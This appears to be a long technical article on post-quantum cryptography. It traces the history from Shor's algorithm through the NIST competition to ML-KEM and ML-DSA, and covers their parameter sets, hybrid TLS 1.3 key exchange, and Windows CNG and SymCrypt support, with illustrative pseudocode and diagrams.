1. The 1184-Byte Field

A Windows endpoint opens a connection to cloudflare.com. In its ClientHello, alongside the 32-byte X25519 public value every TLS 1.3 handshake has carried since 2018, sits a new 1184-byte field whose contents look like uniform noise -- an ML-KEM-768 encapsulation key, the bytes by which Microsoft, Cloudflare, Google, Apple, and OpenSSH have chosen to close a future they cannot yet see [@draft-tls-ecdhe-mlkem, @cloudflare-pq-2024].

Two adversaries are watching the handshake. The first has 2026 compute and cannot break either share. The second has a hypothetical 2040 fault-tolerant quantum computer, breaks the X25519 share trivially via Shor's algorithm, and walks away unable to recover the ML-KEM-768 session key. Why does the handshake hold against the second adversary, and what did it take to make that field 1184 bytes long?

A family of cryptographic algorithms whose security rests on mathematical problems for which no efficient quantum algorithm is known. PQC is a public-key replacement programme: it replaces RSA, Diffie-Hellman, and elliptic-curve discrete-log primitives that Shor's algorithm collapses in polynomial time on a fault-tolerant quantum computer. Symmetric primitives (AES, SHA-2/3) survive with parameter increases and are not the target of PQC standardisation.

The wire format is concrete and currently shipping. The IETF draft draft-ietf-tls-ecdhe-mlkem-04 (published 8 February 2026) defines three hybrid Supported Groups codepoints in TLS 1.3: X25519MLKEM768 at 0x11EC, SecP256r1MLKEM768 at 0x11EB, and SecP384r1MLKEM1024 at 0x11ED [@draft-tls-ecdhe-mlkem, @iana-tls-parameters]. The ClientHello key_share extension carries 32 bytes of X25519 public value followed by 1184 bytes of ML-KEM-768 encapsulation key. The ServerHello reply carries 32 bytes of X25519 public value followed by 1088 bytes of ML-KEM-768 ciphertext. Both endpoints derive an X25519 shared secret and an ML-KEM-768 shared secret, concatenate them, and feed both into TLS 1.3's HKDF-Extract per draft-ietf-tls-hybrid-design-16 [@draft-tls-hybrid]. An adversary who can break either component but not both still learns nothing.

A threat model in which an adversary records today's network traffic and stores it for years, decrypting it once a sufficiently capable quantum computer is available. The threat applies to any traffic whose secrecy must survive past the time-to-cryptographically-relevant-quantum-computer; it does not apply to signed-binary integrity, which is validated at load time. Hybrid TLS shifts the boundary from "must trust X25519 forever" to "must trust either X25519 or ML-KEM-768 forever" [@cloudflare-pq-2024, @mosca-2015].

The first internet-scale deployment of the construction landed on October 3, 2022, when Cloudflare turned on hybrid post-quantum key agreement by default for every website and API on its edge [@cloudflare-pq-for-all].Cloudflare's blog post measured the bytes-on-the-wire cost of the deployment as roughly 1.1 KB per handshake added; by March 2024 nearly two percent of all TLS 1.3 connections to Cloudflare's edge negotiated post-quantum key agreement, with double-digit adoption forecast by year-end [@cloudflare-pq-2024]. The Cloudflare default-on date predated FIPS 203's August 2024 finalisation by almost two years, which is why early deployments speak of "Kyber" and "X25519Kyber768Draft00" rather than ML-KEM.

Apple's iMessage PQ3 followed in February 2024, framed as "Level 3" -- post-quantum key establishment plus post-quantum ratcheting [@apple-imessage-pq3]. By May 2026, Microsoft, Google, OpenSSH, and Signal have all shipped or announced hybrid post-quantum key agreement; Section 7 catalogues the per-vendor deployments verbatim, anchored to each vendor's own release artifact [@cloudflare-pq-2024, @signal-pqxdh, @openssh-9-9].

This article delivers two promises. The first is algorithm-level: by the end of Section 5 you will know ML-KEM, ML-DSA, and SLH-DSA well enough to reason about parameter-set choices, side-channel posture, and FIPS-mandated byte counts. The second is platform-level: by the end of Section 6 you will know which CNG identifier ships in which SymCrypt release, which Schannel toggle gates X25519MLKEM768 on 24H2, and which Windows surfaces (Schannel, AD CS, .NET 10, Azure Key Vault) carry PQC in May 2026 and which (IKEv2, SMB, RDP, BitLocker network unlock, Kerberos PKINIT, Windows Hello attestation) do not.

Every line of code, every parameter set, every byte of that 1184-byte field has a thirty-year story behind it. To understand what shipped, we start where it began -- with a 1994 paper that put a clock on every public-key cryptosystem then in production.

2. Historical Origins

Why is replacing public-key cryptography hard? Because in 1976, Whitfield Diffie and Martin Hellman defined the primitive that everything since has imitated. Their "New Directions in Cryptography" paper, in IEEE Transactions on Information Theory 22(6), introduced the asymmetric key-agreement model [@dh-1976]: two parties exchange public values, derive a shared secret, and never share the underlying private state. The shared secret was the discrete logarithm of a public element in a finite group. Every public-key construction that followed -- RSA (1977), the Diffie-Hellman variants, DSA (1991), ECDSA and the elliptic-curve variants (mid-1980s into the 1990s, with X25519 standardised in RFC 7748 in 2016) -- inherited one of two hard problems: integer factoring, or the discrete logarithm in some abelian group [@rfc-7748].

Eighteen years later, Peter Shor at Bell Labs found a polynomial-time quantum algorithm for both [@shor-1996]. The arXiv preprint quant-ph/9508027 dates to August 1995; the journal version appeared as "Polynomial-Time Algorithms for Prime Factorization and Discrete Logarithms on a Quantum Computer" in SIAM Journal on Computing 26(5) (1997) 1484-1509; DOI 10.1137/S0097539795293172. Shor's algorithm requires a fault-tolerant quantum computer with thousands of logical qubits -- the kind of machine that does not yet exist, and may never exist in some accounts. But if it does exist, RSA, DH, DSA, ECDSA, and ECDH all collapse simultaneously. Not weakened; broken. Doubling key sizes does not help; the algorithm's runtime is polynomial in the key length.

A polynomial-time quantum algorithm, due to Peter Shor (1994-1996), that solves integer factoring and the discrete logarithm in arbitrary abelian groups [@shor-1996]. The algorithm reduces both problems to finding the period of a function via the Quantum Fourier Transform, which a fault-tolerant quantum computer can compute in time polynomial in the input size. RSA, finite-field Diffie-Hellman, DSA, and the elliptic-curve variants ECDH/ECDSA/X25519 are all structurally retired by Shor's algorithm; no parameter increase rescues them.

Two years later, Lov Grover (also at Bell Labs) published the symmetric-key counterpart. Grover's algorithm searches an unstructured database of N items in O(sqrt(N)) quantum steps [@grover-1996]. Applied to AES-128, Grover reduces the effective key strength to roughly $2^{64}$ quantum-search steps -- comparable to a 64-bit symmetric key. Applied to AES-256, it leaves 128 bits of security. The asymmetric lane is fatal; the symmetric lane is a parameter bump. This is why the entire post-quantum programme is a public-key replacement programme, not a symmetric one.The standard policy response to Grover is to double the symmetric key size. AES-256 retains 128 bits of post-quantum security; SHA-384 retains 192 bits of preimage resistance; SHA-512 retains 256 bits. CNSA 2.0 mandates AES-256 and SHA-384 specifically for this reason [@cnsa20-csa]. Grover-style speedups do not generalise to AEAD constructions in the same way the asymmetric collapse does; the cost of doubling is structural and easy to absorb, which is why no one tries to invent a "post-quantum AES."

If Shor and Grover are 1994-1996 results, why is replacing public-key cryptography not a 2040 problem? Michele Mosca's 2015 ePrint 2015/1075 named the deadline. Mosca's inequality is one line:

$$X + Y > Z$$

where X is the security shelf-life of the data (how long today's traffic must remain confidential), Y is the migration time (how long it takes to deploy quantum-safe systems), and Z is the time until a cryptographically relevant quantum computer arrives. If X + Y exceeds Z, the adversary harvesting traffic today wins regardless of when the quantum computer arrives [@mosca-2015].

The deadline relation $X + Y > Z$: if data-secrecy lifetime (X) plus migration time (Y) exceeds time-to-quantum-computer (Z), harvest-now-decrypt-later succeeds. Mosca's framing turned an open quantum-engineering timeline into an actionable IT-policy lever; if you cannot predict Z, you must minimise Y, which means starting migration now [@mosca-2015]. If the security shelf-life of your data plus the migration time to deploy quantum-safe systems exceeds the time-to-quantum-computer, the adversary harvesting traffic today wins. -- the X + Y > Z framing, Mosca (eprint 2015/1075).

On September 7, 2022, the U.S. National Security Agency turned Mosca's inequality into national-security policy. The Commercial National Security Algorithm Suite 2.0 (CNSA 2.0) is the algorithm list the NSA requires for protecting U.S. National Security Systems [@nsa-cnsa-news, @cnsa20-csa]. The current revision (May 30, 2025) names ML-KEM-1024 for key establishment, ML-DSA-87 for general digital signatures, LMS and XMSS for firmware signing, AES-256 for symmetric encryption, and SHA-384 for hashing. The policy carries four dates that drive every U.S. vendor roadmap including Microsoft's: acquisition preference for PQC in new National Security Systems by January 1, 2027; legacy-algorithm phase-out beginning December 31, 2030; mandatory PQC adoption by December 31, 2031; and disallowance of RSA / ECDSA after 2035.

Shor's algorithm requires a fault-tolerant quantum computer that does not yet exist. So why isn't the migration easy? Because cryptographers tried to replace the asymmetric primitive for thirty years before this paper -- and every early attempt failed in a different way.

3. Early Approaches and Their Failures

Three rejected family trees and one almost-survivor explain why ML-KEM looks the way it does in 2026. Each was tried; each failed in a specific way; the failure shaped what survived.

McEliece (1978) is the oldest post-quantum proposal still under active study. Robert McEliece's construction uses the hardness of decoding a general linear code -- specifically, a binary Goppa code disguised by random permutations and a scrambling matrix [@mceliece-1978]. The cryptosystem has survived forty-eight years of cryptanalysis with no structural break; its security argument is one of the most conservative in cryptography. The cost is the public key. Classic McEliece at NIST security category 1 has public keys of roughly 261 kilobytes; at category 5, about 1 megabyte [@mceliece-project]. That size makes it unusable in TLS, where the entire ClientHello must fit in one or two IP packets. Classic McEliece survives as a Round-4 NIST candidate; it was not selected for FIPS standardisation because of the key-size constraint, but is widely cited as the conservative fallback for long-term archival key wrapping.

HFE and multivariate cryptography (1996) form the most thoroughly broken family. Jacques Patarin's Hidden Field Equations (HFE) hide the structure of a univariate polynomial over a small extension field by composing with random linear transformations on each side. Kipnis and Shamir broke the original HFE construction in 1999 [@kipnis-shamir-1999]. The descendant scheme Rainbow advanced through three NIST rounds before Ward Beullens published "Breaking Rainbow Takes a Weekend on a Laptop" in eprint 2022/214 on 25 February 2022, recovering Rainbow's secret key in 53 hours on a commodity laptop [@beullens-rainbow-2022].53 hours on a commodity laptop is the visceral data point. Rainbow had been a NIST third-round signature finalist; one paper, one weekend of CPU time, retired it. Beullens' result is now the canonical example in PQC pedagogy of how a cryptographic finalist can be retired by an algorithmic insight that nobody noticed during seven years of NIST evaluation. The multivariate signature lane is effectively closed in 2026, with the partial exception of small specialised constructions (UOV-style schemes) that NIST is considering in the additional-signatures onramp [@nist-pqc-dig-sig].

NTRU (1996) is the founding lattice cryptosystem. Jeffrey Hoffstein, Jill Pipher, and Joseph Silverman presented "NTRU: A ring-based public key cryptosystem" at ANTS-III in 1998 [@ntru-1996]. The construction works in a polynomial ring $R = \mathbb{Z}[X]/(X^n - 1)$ and offers public keys of roughly 1-2 kilobytes -- the first lattice cryptosystem with sizes competitive with RSA. NTRU was patent-encumbered for two decades (US Patents 6,081,597 and 6,144,740 expired in August and November 2017) [@ntru-patents], which kept it out of standards work for the formative years. Falcon, the NIST-selected lattice signature scheme that became FIPS 206 draft, inherits the NTRU lattice structure directly.

SIDH and SIKE (2011-2022) were the most efficient post-quantum proposal by public-key size. Supersingular Isogeny Diffie-Hellman, introduced by Jao and De Feo in 2011 [@jao-defeo-2011], achieved public keys of roughly 330 bytes at category 1 [@wp-sidh] -- smaller than ML-KEM-512's 800 bytes. NIST advanced SIKE to the fourth round of evaluation on 5 July 2022 [@nist-pqc-selection-2022]. On 27 July 2022, twenty-two days later, Wouter Castryck and Thomas Decru published "An efficient key recovery attack on SIDH," recovering SIKEp434's secret key in about ten minutes on a single CPU core via a torsion-point exploitation of Kani's reducibility criterion [@castryck-decru-sidh]. The higher-security parameter set SIKEp751 (NIST category 5) fell in roughly three hours on the same hardware. A concurrent paper by Maino and Martindale extended the attack to arbitrary starting curves [@maino-martindale-sidh]. One paper, one month, the entire isogeny lane retired. SIKE is the canonical example of why NIST's portfolio rests on multiple unrelated hardness assumptions.

flowchart TD PQ["Post-Quantum Cryptography"] PQ --> Lat["Lattice
(LWE, Module-LWE, NTRU)"] PQ --> Code["Code-based
(Goppa, Quasi-Cyclic)"] PQ --> Multi["Multivariate
(HFE, Rainbow)"] PQ --> Hash["Hash-based
(XMSS, LMS, SPHINCS+)"] PQ --> Iso["Isogeny
(SIDH, SIKE)"] Lat --> LatV["ACTIVE: ML-KEM, ML-DSA, Falcon"] Code --> CodeV["NICHE: HQC, Classic McEliece"] Multi --> MultiV["DEAD: Rainbow broken 2022"] Hash --> HashV["ACTIVE: SLH-DSA, LMS, XMSS"] Iso --> IsoV["DEAD: SIDH/SIKE broken 2022"] A proof technique, introduced for lattices by Miklos Ajtai in 1996 and refined for LWE by Oded Regev in 2005, that ties the average-case security of a cryptosystem to the worst-case hardness of an underlying lattice problem [@regev-2005]. The reduction says: solving random instances of the cryptosystem at any non-negligible advantage gives an algorithm for the *worst-case* hard problem. RSA has no analogous reduction; the average factoring instance is conjectured hard, but no theorem ties it to worst-case factoring. The lattice reduction is the structural argument for why post-quantum lattice cryptography may be more conservative, in a formal sense, than RSA.

The portfolio lesson lands here, and it is the article's first aha moment. Post-quantum cryptography is not a single family; it is a portfolio across multiple hardness assumptions, because each one has been broken at least once during the modern standardisation effort. The Rainbow break and the SIKE break both happened during the NIST competition, in 2022, on candidates that NIST had advanced for further study. This is why the eventual slate -- ML-KEM (lattice) plus SLH-DSA (hash) -- sits on two structurally unrelated foundations. A single mathematical break cannot retire the whole programme.

Lattices survived. But the lattices of 2005 had megabyte-scale public keys, unusable in TLS. How those keys were compressed to kilobytes is the story of the next section.

4. The Evolution -- Lattices in Five Generations

In 2005, Oded Regev published a paper that gave lattice cryptography the mathematical foundation RSA never had. By 2010, the same idea had been compressed by a factor of n via the Number Theoretic Transform; by 2015 it had been generalised with a parameter knob that let one base ring serve every security category; by 2024 it was a Federal Information Processing Standard. This section walks the generation-by-generation story of how lattices got from impossible to inevitable.

Generation 0 (1976-1994): the classical baseline

Diffie-Hellman, RSA, DSA, ECDH, ECDSA. Five primitives over four decades, all on discrete-log-style hardness in one group or another, all retired in one stroke by Shor's algorithm. The classical baseline is what PQC replaces. Nothing about post-quantum cryptography innovates on the symmetric side; AES and SHA-2 survive with parameter increases.

Generation 1 (1996-2009): plural hard problems, mostly impractical

Miklos Ajtai's 1996 STOC paper "Generating Hard Instances of Lattice Problems" introduced the first worst-case-to-average-case reduction for a lattice problem (the Short Integer Solution problem) [@ajtai-1996]. The reduction was a foundational theoretical result; the cryptographic constructions built from it had public keys in the megabytes.

Nine years later, Oded Regev published "On Lattices, Learning with Errors, Random Linear Codes, and Cryptography" at STOC 2005 [@regev-2005]. The Learning With Errors problem is simple to state.

Given a uniformly random matrix $A \in \mathbb{Z}_q^{m \times n}$, a secret vector $s \in \mathbb{Z}_q^n$, and a small noise vector $e$ sampled from a Gaussian-like distribution, distinguish the pair $(A, As + e)$ from a uniformly random pair $(A, b)$ where $b$ is uniform in $\mathbb{Z}_q^m$. LWE is conjectured hard for any polynomial-time algorithm classical or quantum; Regev's theorem ties LWE to the worst-case hardness of approximating shortest-vector problems on $n$-dimensional lattices, via a quantum reduction [@regev-2005].

LWE was the cryptographic breakthrough. The construction was clean, the reduction tied average-case security to worst-case lattice hardness, and the resulting cryptosystem was simple enough that any cryptographer could implement it. But the public key was a full $n \times n$ matrix over $\mathbb{Z}_q$ -- $O(n^2 \log q)$ bits. At the parameter sizes needed for 128-bit security, that meant several megabytes of public key. Unusable in TLS, unusable in X.509, unusable in any deployment that touches the wire.

Generation 2 (2010-2017): the ring-LWE and module-LWE compression

The compression that made lattices deployable was a single algebraic move. Lift LWE from $\mathbb{Z}_q$ to a polynomial ring. Lyubashevsky, Peikert, and Regev's 2010 paper "On Ideal Lattices and Learning with Errors over Rings" (eprint 2012/230) introduced Ring-LWE [@lpr-2010-ringlwe]. The underlying ring is $R_q = \mathbb{Z}_q[X]/(X^n + 1)$ for $n$ a power of two; the secret and noise are now polynomials in $R_q$ rather than vectors over $\mathbb{Z}_q$. Multiplying two ring elements becomes a polynomial multiplication, which the Number Theoretic Transform reduces from $O(n^2)$ scalar multiplications to $O(n \log n)$.

A discrete Fourier transform over a finite field rather than the complex numbers. For a prime $q$ such that $2n$ divides $q - 1$, NTT converts a polynomial $a(X) \in \mathbb{Z}_q[X]/(X^n + 1)$ into its evaluations at the $2n$-th roots of unity in $\mathbb{Z}_q$. Polynomial multiplication then becomes pointwise multiplication of the NTT vectors. NTT is the speedup that compresses Ring-LWE arithmetic from $O(n^2)$ to $O(n \log n)$ and is the reason ML-KEM-768 encapsulates in tens of microseconds on commodity x86-64 [@fips-203-pdf].

Public keys dropped from megabytes to kilobytes. The 2010 lift is the load-bearing intellectual move; everything subsequent is engineering.

Adeline Langlois and Damien Stehle's 2012/2015 Module-LWE paper added a parameter knob [@langlois-stehle-modulelwe]. Module-LWE works over $R_q$ rings of fixed degree $n$ (typically 256 in ML-KEM), but lifts the secret and matrix into module rank $k$: $A$ is a $k \times k$ matrix of ring elements, $s$ is a $k$-vector of ring elements. Now one base ring of degree 256 can serve every NIST security category by varying $k \in {2, 3, 4}$. ML-KEM-512 uses $k = 2$; ML-KEM-768 uses $k = 3$; ML-KEM-1024 uses $k = 4$. The compiler-style metaphor is exact: Ring-LWE was an over-fitted special case, Module-LWE generalises it.

A generalisation of Learning With Errors over polynomial rings of fixed degree, in which the secret is a $k$-vector of ring elements and the matrix is $k \times k$. Module-LWE inherits the worst-case-to-average-case reduction from Ring-LWE [@langlois-stehle-modulelwe], offers a finer-grained security knob than either LWE or Ring-LWE, and is the underlying hardness assumption of ML-KEM (FIPS 203) and ML-DSA (FIPS 204) [@fips-203-pdf, @fips-204-pdf].

The first TLS deployment of a Ring-LWE key exchange landed in 2014, and Microsoft Research was at the centre of it.

The BCNS 2014 paper "Post-quantum key exchange for the TLS protocol from the ring learning with errors problem" by Joppe Bos, Craig Costello, Michael Naehrig, and Douglas Stebila (eprint 2014/599) was the first end-to-end TLS implementation of a Ring-LWE key exchange [@bcns-2014]. Two of the four authors -- Costello and Naehrig -- were Microsoft Research Redmond. Two years later, the same Microsoft Research group plus collaborators published Frodo (CCS 2016, eprint 2016/659), the unstructured-LWE conservative fallback design with no ring algebra [@frodo-2016]. Frodo became FrodoKEM in the NIST process; FrodoKEM was selected as a Round-3 alternate but not advanced to standardisation [@frodokem-project]. Microsoft Research's own retrospective spans this work: "Our PQC effort began in 2014 when we published research on post-quantum algorithms and later quantum cryptanalysis ... we participated in four submissions to the original 2017 NIST PQC call and one submission to the current call. Since 2018 we have been experimenting with verified versions of PQC algorithms and in 2019 Microsoft Research completed testing of an experimental PQC-protected VPN tunnel between Redmond, Washington, and Scotland" [@ms-quantum-safe-blog]. The 2024 FIPS publication did not surprise Microsoft.

Google's Chrome team deployed the construction in production first. CECPQ1 ("Combined Elliptic-Curve and Post-Quantum 1") shipped in Chrome Canary in July 2016, combining X25519 with NewHope [@google-cecpq1]. NewHope was a Ring-LWE construction by Alkim, Ducas, Poppelmann, and Schwabe; CECPQ1 ran for several months as an experiment, measured the cost of an extra ~2 KB on each handshake, and was retired. CECPQ2 replaced it with NTRU-HRSS -- the announcement post by Adam Langley names the lineage explicitly ("CECPQ1 was the experiment ... It's about time for CECPQ2") and the NTRU-HRSS basis -- and was wound down in 2022 as Chrome migrated to the X25519+Kyber-768 hybrid following NIST's July 2022 selection [@cloudflare-pq-2024]. The parallel CECPQ2b experiment paired X25519 with SIKE; the Castryck-Decru break that same month retired CECPQ2b along with the entire isogeny lane. The Cloudflare-Microsoft-Google triad has been iterating in production since.

Generation 3 (2017-2022): the NIST competition

NIST issued the formal call for post-quantum public-key submissions in December 2016. Eighty-two submissions arrived by the November 2017 deadline; sixty-nine were judged complete and proper, advancing into Round 1 (announced December 2017; narrowed to 26 in Round 2, January 2019) [@wp-nist-pqc].The 82-vs-69 discrepancy is a frequent source of confusion in PQC pedagogy. Eighty-two total submissions, sixty-nine deemed "complete and proper" by NIST's intake review, advanced to Round 1. The remaining thirteen had documentation defects or were withdrawn. Wikipedia's "NIST Post-Quantum Cryptography Standardization" article spells out both numbers verbatim [@wp-nist-pqc]. The field narrowed to 26 algorithms in Round 2 (January 2019), then to 7 finalists plus 8 alternates in Round 3 (July 2020). NIST IR 8413 (July 2022) is the canonical status report on Round 3 [@nist-ir-8413].

On 5 July 2022, NIST announced the first four standardisation selections: CRYSTALS-Kyber for key encapsulation, plus CRYSTALS-Dilithium, FALCON, and SPHINCS+ for signatures [@nist-pqc-selection-2022]. Three were lattice schemes; one (SPHINCS+) was hash-based. The same announcement moved Classic McEliece, BIKE, HQC, and SIKE to a fourth round for further evaluation. Twenty-five days later, the Castryck-Decru attack retired SIKE. NIST IR 8545 documents the eventual fourth-round selection of HQC (announced 7 March 2025) over BIKE, with Classic McEliece left as a candidate for niche-use standardisation due to its key size [@nist-hqc-news].

gantt dateFormat YYYY axisFormat %Y section Algorithm research Diffie-Hellman :milestone, dh, 1976, 0 Shor's algorithm :milestone, shor, 1994, 0 NTRU :milestone, ntru, 1996, 0 Regev LWE :milestone, lwe, 2005, 0 Ring-LWE (LPR) :milestone, rlwe, 2010, 0 Module-LWE :milestone, mlwe, 2012, 0 BCNS / Frodo / NewHope :milestone, bcns, 2014, 0 section NIST process PQC call announced :milestone, call, 2016, 0 Round 1 (69 candidates) :milestone, r1, 2017, 0 Round 2 (26 candidates) :milestone, r2, 2019, 0 Round 3 finalists :milestone, r3, 2020, 0 Selections + Round 4 :milestone, sel, 2022, 0 Rainbow + SIKE broken :milestone, brk, 2022, 0 FIPS 203 / 204 / 205 :milestone, fips, 2024, 0 HQC selected :milestone, hqc, 2025, 0 section Windows shipping SymCrypt v103.5.0 ML-KEM :milestone, sc1, 2024, 0 Insider Canary CNG PQ :milestone, can, 2025, 0 .NET 10 GA :milestone, dn, 2025, 0 Schannel X25519MLKEM768 :milestone, sch, 2026, 0 TPM 2.0 v1.85 PQC :milestone, tpm, 2026, 0

Generation 4 (2023-2024): standardisation

The draft FIPS standards published in August 2023; the final versions landed on 13 August 2024, when the Secretary of Commerce approved FIPS 203, FIPS 204, and FIPS 205 [@nist-fips-approved-news]. Names changed in the transition: CRYSTALS-Kyber [@crystals-kyber-paper] became Module-Lattice-Based Key-Encapsulation Mechanism (ML-KEM); CRYSTALS-Dilithium became Module-Lattice-Based Digital Signature Algorithm (ML-DSA); SPHINCS+ [@sphincsplus-framework] became Stateless Hash-Based Digital Signature Algorithm (SLH-DSA). The renaming was deliberate; NIST wanted standard names that described the construction rather than the project. Falcon's standardisation slipped to FIPS 206 in draft, principally because the floating-point Gaussian sampler required for Falcon's compact signatures is unusually hard to make both fast and constant-time [@nist-pqc-dig-sig].

Generation 5 (2024-2026): shipping on Windows

SymCrypt v103.5.0 added ML-KEM "per final FIPS 203" along with XMSS and XMSS^MT [@symcrypt-changelog]. Subsequent versions added LMS (v103.6.0), ML-DSA (v103.7.0), FIPS-approved-services indicator (v103.8.0), ML-DSA External-Mu sign/verify (v103.9.0), FIPS CAST plus ML-KEM/ML-DSA keygen pairwise consistency tests (v103.9.1), and Composite ML-KEM (v103.11.0). The Windows Insider Canary channel exposed the CNG identifiers in May 2025 [@ms-pqc-windows-insider]. .NET 10 (GA November 2025) shipped managed types System.Security.Cryptography.MLKem, MLKemCng, MLDsa, MLDsaCng [@dotnet-10-launch, @dotnet-mlkem, @dotnet-mlkemcng]. Schannel hybrid TLS 1.3 X25519MLKEM768 reached Server 2025 and 24H2 in preview behind Group Policy in early 2026.

The competition is over. The standards are published. The SymCrypt versions are shipping. We have arrived at the moment where the algorithm internals matter -- because every Windows engineer now writes code against BCRYPT_MLKEM_ALG_HANDLE, and code that uses an algorithm should know how it works.

5. The Breakthrough -- ML-KEM, ML-DSA, SLH-DSA at Engineer Depth

Three FIPS standards. Three algorithms. Three Windows API surfaces. Each rests on a different hardness assumption. Each has its own parameter zoo, key sizes, and side-channel surface. This section walks all three at the level a Windows engineer needs to make procurement, audit, and migration decisions.

5.1 ML-KEM (FIPS 203) -- the default KEM

ML-KEM is the only NIST-finalised key-encapsulation mechanism. It is the encryption primitive of the post-quantum era on Windows. The algebra is Module-LWE / Module-LWR over $R_q = \mathbb{Z}_q[X]/(X^{256} + 1)$ with $q = 3329$ -- a 12-bit prime chosen to make NTT arithmetic fast on 16-bit and 32-bit lanes [@fips-203-pdf]. The base ring has degree 256; the module rank $k$ selects the parameter set.

Parameter set	$k$	NIST category	Encapsulation key (bytes)	Ciphertext (bytes)	Shared secret (bytes)
ML-KEM-512	2	1 (AES-128 equivalent)	800	768	32
ML-KEM-768	3	3 (AES-192 equivalent)	1184	1088	32
ML-KEM-1024	4	5 (AES-256 equivalent)	1568	1568	32

The byte counts in the table are verbatim from the FIPS 203 standard [@fips-203-pdf, @wp-kyber]. Cloudflare's October 2022 deployment and Schannel's X25519MLKEM768 both target ML-KEM-768 specifically -- the category-3 sweet spot that survives even an aggressive cryptanalytic improvement against Module-LWE [@cloudflare-pq-for-all, @draft-tls-ecdhe-mlkem]. Apple's PQ3 splits its parameter selection: ML-KEM-1024 for the initial key exchange and Kyber-768 for the ongoing asymmetric ratchet [@apple-imessage-pq3]. OpenSSH 9.0+ deployed a different post-quantum primitive entirely -- Streamlined NTRU Prime in sntrup761x25519-sha512 [@openssh-9-0] -- and OpenSSH 9.9 (released 19 September 2024) added the ML-KEM-768-based group mlkem768x25519-sha256 available by default alongside it [@openssh-9-9].

A generic construction that converts an IND-CPA-secure public-key encryption scheme into an IND-CCA2-secure key-encapsulation mechanism. The transform re-encrypts the plaintext during decapsulation and verifies the resulting ciphertext bit-for-bit; any mismatch causes decapsulation to return an implicit-rejection pseudorandom value rather than the real shared secret. ML-KEM wraps an IND-CPA-secure scheme called K-PKE with the FO transform; the FO wrapper is what makes ML-KEM safe to use with long-term keys [@fips-203-pdf].

ML-KEM has three operations: KeyGen produces $(ek, dk)$; Encaps(ek) produces $(K, c)$ where $K$ is the 32-byte shared secret and $c$ is the ciphertext; Decaps(dk, c) recomputes $K$. The CNG surface mirrors this exactly. The canonical Microsoft idiom (from Microsoft Learn's CNG ML-KEM examples, currently marked prerelease) is BCryptGenerateKeyPair with the pseudo-handle BCRYPT_MLKEM_ALG_HANDLE, followed by BCryptSetProperty setting BCRYPT_PARAMETER_SET_NAME to BCRYPT_MLKEM_PARAMETER_SET_768, followed by BCryptFinalizeKeyPair, followed by BCryptExportKey to extract the encapsulation key as a BCRYPT_MLKEM_ENCAPSULATION_BLOB [@cng-mlkem-examples]. The new verbs BCryptEncapsulate and BCryptDecapsulate complete the picture; neither existed in CNG before the ML-KEM surface was added.

sequenceDiagram participant C as Client (Windows / Schannel) participant S as Server (Cloudflare / IIS) C->>S: ClientHello key_share = X25519 (32B) || ML-KEM-768 ek (1184B) Note over S: Generates X25519 keypair Note over S: Computes ML-KEM Encaps(ek) Note over S: Yields ct and K_pq S->>C: ServerHello key_share = X25519 (32B) || ML-KEM-768 ct (1088B) Note over C: Derives ECDH shared secret K_ecdh Note over C: Computes ML-KEM Decaps for K_pq Note over C,S: HKDF-Extract IKM = K_ecdh concat K_pq Note over C,S: Yields TLS 1.3 traffic secrets

The internal construction of ML-KEM combines an IND-CPA-secure public-key encryption scheme called K-PKE with the Fujisaki-Okamoto-Hofheinz transform to produce an IND-CCA2 KEM. K-PKE is a Regev-style encryption with module structure; the encryption is illustrative-grade simple.

{// Illustrative ML-KEM K-PKE encryption. // The FIPS 203 standard is the normative source for byte-exact operations. // q = 3329, n = 256, ring R_q = Z_q[X] / (X^n + 1), module rank k in {2, 3, 4}. function kpkeEncrypt(ek: PublicKey, message: number[], seed: Uint8Array) { const { A, t, k } = ek; // A is k x k matrix in R_q, t is k-vector in R_q const r = sampleSmallCBD(seed, k); // r: k-vector, centred binomial noise const e1 = sampleSmallCBD(seed, k); // e1: k-vector, fresh noise const e2 = sampleSmallSingle(seed); // e2: scalar polynomial, fresh noise const u = ringMatVecMul(transpose(A), r); addInPlace(u, e1); // u = A^T r + e1 const v = ringDot(t, r); // v = t . r addInPlace(v, e2); // v = t.r + e2 const mEncoded = encodeMessage(message); // 256-bit message -> R_q element addInPlace(v, mEncoded); // v += Encode(message) return { u, v }; // ciphertext (u in R_q^k, v in R_q) }}

The IND-CCA2 wrapper that becomes ML-KEM proper is the FO transform: hash the message and randomness into the encapsulation, then re-encrypt during decapsulation and reject if the ciphertext does not match. Decapsulation on a tampered ciphertext returns a pseudorandom shared secret derived from the secret key -- implicit rejection -- rather than an error code that an attacker could observe. This is what gives ML-KEM CCA2 security suitable for static keys in TLS, X.509, and CNG.

5.2 ML-DSA (FIPS 204) -- the default lattice signature

ML-DSA is the general-purpose lattice signature scheme. Same base ring of degree 256 as ML-KEM, but with a different prime: $q = 8380417$, a 23-bit prime [@fips-204-pdf]. The disparity is intentional; ML-KEM and ML-DSA do not share keys, so their NTT parameter choices are independently optimised. The construction is Fiat-Shamir-with-aborts over Module-LWE and Module-SIS.

Parameter set	NIST category	Public key (bytes)	Signature (bytes)
ML-DSA-44	2	1312	2420
ML-DSA-65	3	1952	3293
ML-DSA-87	5	2592	4595

Numbers verbatim from FIPS 204 [@fips-204-pdf]. CNSA 2.0 selects ML-DSA-87 specifically as the general-signature algorithm for U.S. National Security Systems [@cnsa20-csa].

A signature construction in which the prover commits to a masking value, hashes the message and commitment to derive a challenge, computes a response that depends on the secret and the challenge, and *aborts and retries* if the response would leak the secret. The "abort" probability is bounded so signing completes in a small constant expected number of restarts. The technique, due to Lyubashevsky, is the foundation of ML-DSA's security argument; the rejection-sampling loop is also the source of a measurable timing variance that constant-time implementations must handle carefully [@fips-204-pdf]. flowchart TD Start["Begin sign(message, sk)"] --> Sample["Sample masking vector y (small ball)"] Sample --> Commit["Compute w = Ay in R_q"] Commit --> Hash["c = H(message || HighBits(w))"] Hash --> Resp["Compute response z = y + c*s_1"] Resp --> Check{"||z||_inf < bound?
||LowBits(w - c*s_2)||_inf < bound?"} Check -->|no| Sample Check -->|yes| Out["Return signature (z, c, h)"]

